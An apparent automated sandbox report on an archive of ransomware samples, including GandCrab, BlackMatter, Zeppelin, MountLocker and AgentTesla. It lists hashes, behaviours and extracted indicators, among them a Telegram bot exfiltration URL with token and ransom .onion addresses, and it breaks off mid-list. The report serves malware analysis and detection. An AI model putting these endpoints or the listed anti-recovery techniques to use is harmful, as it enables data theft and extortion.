Resubmissions
17-09-2024 18:15
240917-wwdeqaxclh 317-09-2024 18:12
240917-wtgpcsxbmh 317-09-2024 18:09
240917-wrmslaxbkl 817-09-2024 18:08
240917-wqx7yaxajf 316-09-2024 14:30
240916-rt67sssfjm 10Analysis
-
max time kernel
99s -
max time network
307s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
16-09-2024 14:30
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00481.7z
Resource
win10v2004-20240802-en
General
-
Target
RNSM00481.7z
-
Size
91.0MB
-
MD5
b5fd3ccf036ee81814eee3b9f0e54643
-
SHA1
7aae850b68fe3234ec0e835113db033f57ab779d
-
SHA256
d73798bca8ae78c37444470da1322fe301418fb534417877d988751bf1da5e18
-
SHA512
f900ad590f822410eb30c9a43b886eae95aa0af44dba2a5bf8779471df410ae4ddf19328c17a5a3578a1fde272771231c9b5ea53218d44e925936d3be264ee90
-
SSDEEP
1572864:MN+sx1CnlGBt7cSjEZn+G6Yawe/IO1ZT5K605B5W79ldy2IkuNcyaG9fA:Mwsx1ulyBCnYYaw8/T5wBQ/uNfaIA
Malware Config
Extracted
C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\ReadMe.txt
Extracted
C:\ProgramData\Package Cache\{ef5af41f-d68c-48f7-bfb0-5055718601fc}\ReadMe.txt
Extracted
agenttesla
https://api.telegram.org/bot1923270472:AAFHljVp-f8Q5-X0iy70Vfe0aTch5THPa-U/sendDocument
Extracted
C:\WzEgyMggM.README.txt
blackmatter
http://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7mifuedyd.onion/WBO0PqltgJ/46f53c1a25a576184e0429cd24bfcd36
http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/LA60VOT96UX8HHOG
Extracted
C:\info.hta
class='mark'>[email protected]</span></div>
class='mark'>[email protected]
[email protected]</span></div>
http://www.w3.org/TR/html4/strict.dtd'>
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
BlackMatter Ransomware
BlackMatter ransomware group claims to be Darkside and REvil succesor.
-
Detected Mount Locker ransomware 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023509-311.dat RANSOM_mountlocker -
Detects Zeppelin payload 2 IoCs
resource yara_rule behavioral1/memory/1112-2955-0x0000000000FA0000-0x0000000000FDE000-memory.dmp family_zeppelin behavioral1/files/0x000700000002369e-3324.dat family_zeppelin -
GandCrab payload 3 IoCs
resource yara_rule behavioral1/memory/3236-581-0x0000000002770000-0x0000000002787000-memory.dmp family_gandcrab behavioral1/memory/3236-582-0x0000000000400000-0x0000000000B4B000-memory.dmp family_gandcrab behavioral1/memory/3236-621-0x0000000000400000-0x0000000000B4B000-memory.dmp family_gandcrab -
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" HEUR-Trojan-Ransom.MSIL.Encoder.gen-412fbcec0b5aa0fd7d09b18ef80d6bbda8026908c99f9f0c58351c52b5ee6ae6.exe -
MountLocker Ransomware
Ransomware family first seen in late 2020, which threatens to leak files if ransom is not paid.
-
Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/972-4852-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7136 bcdedit.exe 6672 bcdedit.exe 4596 bcdedit.exe 8092 bcdedit.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3888 powershell.exe 3796 powershell.exe -
pid Process 6396 wbadmin.exe 6396 wbadmin.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 6848 netsh.exe 6160 netsh.exe 804 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 5804 takeown.exe 7200 icacls.exe -
resource yara_rule behavioral1/files/0x00070000000235ab-1149.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation explorer.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 17 IoCs
pid Process 1328 HEUR-Trojan-Ransom.MSIL.Agent.gen-5bdf63530fc9ab47e57a92a17a627b93c668d313742b989819252ee5152a9061.exe 3176 HEUR-Trojan-Ransom.MSIL.Blocker.gen-75f615f27b23cc56767ed8b3e684d69b27376165432116913f30cbc12c439fb2.exe 4632 HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe 2340 HEUR-Trojan-Ransom.MSIL.Blocker.gen-a7cfc747d2b20fbbd20f8121c26b46041101e14b0c912afa3e220239f146685e.exe 4984 HEUR-Trojan-Ransom.MSIL.Encoder.gen-412fbcec0b5aa0fd7d09b18ef80d6bbda8026908c99f9f0c58351c52b5ee6ae6.exe 2768 Codec.exe 1456 HEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exe 4568 explorer.exe 2908 Codec.tmp 964 HEUR-Trojan-Ransom.Win32.Crypmod.gen-50234101339d8a152f9c0c111c6e5fac70826d53cd1480d224a422b7182ec0f0.exe 4484 zbhnd.exe 4032 HEUR-Trojan-Ransom.Win32.Crypmod.gen-8b6f0bbead4faeb094314e83e1f1b05d8c81b2102ccea0defdbd5df0f035a47f.exe 1008 HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-9c5113ae60fa19421e1d90ba13cc5a0ae4b675ae3ba5a2e4de8aae2ece779543.exe 1112 HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-be172fac0466cdc031266dc30e9495a0e71449e8b03f88f9fb4a7a231946796c.exe 1604 HEUR-Trojan-Ransom.Win32.Cryptoff.vho-dc9742ddc4a89ef7e38a1a60cafceaffd6cd7d2cd59b5bac941fc81010696b6e.exe 3236 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe 3876 HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 5804 takeown.exe 7200 icacls.exe -
resource yara_rule behavioral1/files/0x0007000000023504-260.dat upx behavioral1/memory/1008-262-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/files/0x0007000000023505-288.dat upx behavioral1/files/0x0003000000000737-575.dat upx behavioral1/files/0x00020000000229c4-574.dat upx behavioral1/files/0x0004000000000735-573.dat upx behavioral1/files/0x0013000000022936-571.dat upx behavioral1/files/0x0004000000000733-572.dat upx behavioral1/files/0x00020000000229c5-599.dat upx behavioral1/files/0x000300000000073b-603.dat upx behavioral1/files/0x00020000000229c6-605.dat upx behavioral1/files/0x0004000000000741-609.dat upx behavioral1/files/0x00020000000229c8-615.dat upx behavioral1/files/0x0004000000000745-613.dat upx behavioral1/files/0x00020000000229c7-611.dat upx behavioral1/files/0x000800000001da0d-619.dat upx behavioral1/files/0x001200000001db63-624.dat upx behavioral1/files/0x000200000002293e-630.dat upx behavioral1/files/0x00060000000167da-634.dat upx behavioral1/files/0x000200000001e3c5-628.dat upx behavioral1/files/0x00020000000229ca-626.dat upx behavioral1/files/0x000900000001daf6-638.dat upx behavioral1/files/0x0016000000022947-636.dat upx behavioral1/files/0x000400000001e2a9-657.dat upx behavioral1/files/0x001200000002295d-655.dat upx behavioral1/files/0x001300000001e0c2-651.dat upx behavioral1/files/0x000200000002295c-647.dat upx behavioral1/files/0x00020000000229c9-622.dat upx behavioral1/memory/1008-1042-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/1112-1061-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/5076-1247-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5076-1527-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5076-1762-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5076-1763-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5076-1761-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5076-1815-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5076-1814-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5076-1879-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/1112-2491-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/1008-2490-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/5076-2494-0x0000000000400000-0x0000000000608000-memory.dmp upx behavioral1/memory/5192-2954-0x0000000000400000-0x00000000004AA000-memory.dmp upx behavioral1/memory/5192-4168-0x0000000000400000-0x00000000004AA000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\u2xlbtlj2a = "C:\\Users\\Admin\\Desktop\\00481\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-dc9742ddc4a89ef7e38a1a60cafceaffd6cd7d2cd59b5bac941fc81010696b6e.exe" HEUR-Trojan-Ransom.Win32.Cryptoff.vho-dc9742ddc4a89ef7e38a1a60cafceaffd6cd7d2cd59b5bac941fc81010696b6e.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\L: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\A: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe File opened (read-only) \??\V: HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 207 2.tcp.ngrok.io 76 iplogger.org 77 iplogger.org 78 iplogger.org 143 2.tcp.ngrok.io 189 discord.com 190 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 91 geoiptool.com -
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\Desktop\Wallpaper HEUR-Trojan-Ransom.MSIL.Encoder.gen-412fbcec0b5aa0fd7d09b18ef80d6bbda8026908c99f9f0c58351c52b5ee6ae6.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\7-zip.chm HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-9c5113ae60fa19421e1d90ba13cc5a0ae4b675ae3ba5a2e4de8aae2ece779543.exe File created C:\Program Files\7-Zip\7-zip.chm.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-9c5113ae60fa19421e1d90ba13cc5a0ae4b675ae3ba5a2e4de8aae2ece779543.exe File created C:\Program Files\7-Zip\7-zip.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-9c5113ae60fa19421e1d90ba13cc5a0ae4b675ae3ba5a2e4de8aae2ece779543.exe File created C:\Program Files\7-Zip\7-zip.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-9c5113ae60fa19421e1d90ba13cc5a0ae4b675ae3ba5a2e4de8aae2ece779543.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 5840 3236 WerFault.exe 125 6044 4860 WerFault.exe 142 6836 7160 WerFault.exe 179 7144 6924 WerFault.exe 188 5528 5240 WerFault.exe 147 3108 6088 WerFault.exe 149 6008 6940 WerFault.exe 199 -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Agent.gen-5bdf63530fc9ab47e57a92a17a627b93c668d313742b989819252ee5152a9061.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-7e9ab70cccff28f533cdefc0608d02de489bf9c1493c931499b5b01e257585bb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Encoder.gen-412fbcec0b5aa0fd7d09b18ef80d6bbda8026908c99f9f0c58351c52b5ee6ae6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.pef-f63819c6d8237b4bdebed3897b3a3f5a2f7bbc9ad1a7b44fa0668a3359f31a99.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-75f615f27b23cc56767ed8b3e684d69b27376165432116913f30cbc12c439fb2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Codec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Crypmod.gen-50234101339d8a152f9c0c111c6e5fac70826d53cd1480d224a422b7182ec0f0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Crypmod.gen-8b6f0bbead4faeb094314e83e1f1b05d8c81b2102ccea0defdbd5df0f035a47f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Codec.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zbhnd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Gen.gen-32a6cef319ce45e3a319a97a5d99b5719a55eef87e0be98367a23d2080b14b95.exe -
Checks SCSI registry key(s) 3 TTPs 26 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service HEUR-Trojan-Ransom.Win32.GandCrypt.pef-474e0e53445801dfb4ddf354df0306f161e2f28ce0615dd16097170c7f52f5ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 5696 ipconfig.exe -
Interacts with shadow copies 3 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 392 vssadmin.exe 6892 vssadmin.exe 7100 vssadmin.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings OpenWith.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3760 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4824 powershell.exe 4824 powershell.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 3208 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe 4536 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4536 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
